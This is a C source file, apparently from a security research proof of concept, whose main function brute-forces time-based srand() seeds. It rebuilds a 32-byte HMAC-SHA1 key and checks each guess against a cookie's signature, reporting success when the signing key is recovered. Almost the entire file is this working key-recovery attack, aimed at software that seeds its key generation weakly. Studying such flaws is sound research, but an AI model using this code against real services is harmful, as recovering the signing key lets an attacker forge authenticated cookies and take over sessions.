#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include "hmac.h"
#include <sys/time.h>

void dump(uint8_t *buffer, size_t length)
{
	for (size_t i = 0; i < length; i++) {
		printf("%02x", buffer[i]);
	}
	printf("\n");
}

uint8_t *decode(char *hexstr)
{
	size_t len = strlen(hexstr);
	assert(len % 2 == 0);
	uint8_t *buf = malloc(len / 2);
	for (size_t i = 0, j = 0; j < len / 2; i += 2, j++) {
		buf[j] = (hexstr[i] % 32 + 9) % 25 * 16 +
			 (hexstr[i + 1] % 32 + 9) % 25;
	}
	return buf;
}

// copied from natashenka@
int bruteHMAC(uint8_t *cookie, size_t cookie_length, uint8_t *key)
{
	struct timeval now;

	gettimeofday(&now, NULL);

	uint32_t seed = (uint32_t)now.tv_sec + 1000000 +
			100000;	 // tv.sec + max(usec) + max(pid)

	printf("[brute] starting seed : %d\n", seed);

	uint8_t random_numbers[20];
	uint8_t h[40];

	while (seed > 0) {
		srand(seed);
		for (int i = 0; i < 5; i++) {
			int r = rand();
			random_numbers[i * 4] = r & 0xff;
			random_numbers[i * 4 + 1] = (r >> 8) & 0xff;
			random_numbers[i * 4 + 2] = (r >> 16) & 0xff;
			random_numbers[i * 4 + 3] = (r >> 24) & 0xff;
		}

		uint32_t counter = 1;

		size_t slen = 20;

		hmac_sha1(random_numbers, sizeof(random_numbers),
			  (uint8_t *)&counter, sizeof(counter), h, &slen);
		counter++;
		hmac_sha1(random_numbers, sizeof(random_numbers),
			  (uint8_t *)&counter, sizeof(counter), &h[20], &slen);

		h[16] = h[36];
		h[17] = h[37];
		h[18] = h[38];
		h[19] = h[39];

		uint8_t sig[20];

		hmac_sha1(h, 32, cookie, cookie_length - 20, sig, &slen);
		// dump(sig, 20);

		if (!memcmp(&cookie[cookie_length - 20], sig, 20)) {
			printf("[brute] success!\n");
			memcpy(key, h, 32);
			return 1;
		}

		if (seed % 250000 == 0) {
			printf("[brute] trying %d\n", seed);
		}
		seed--;
	}
	return 0;
}
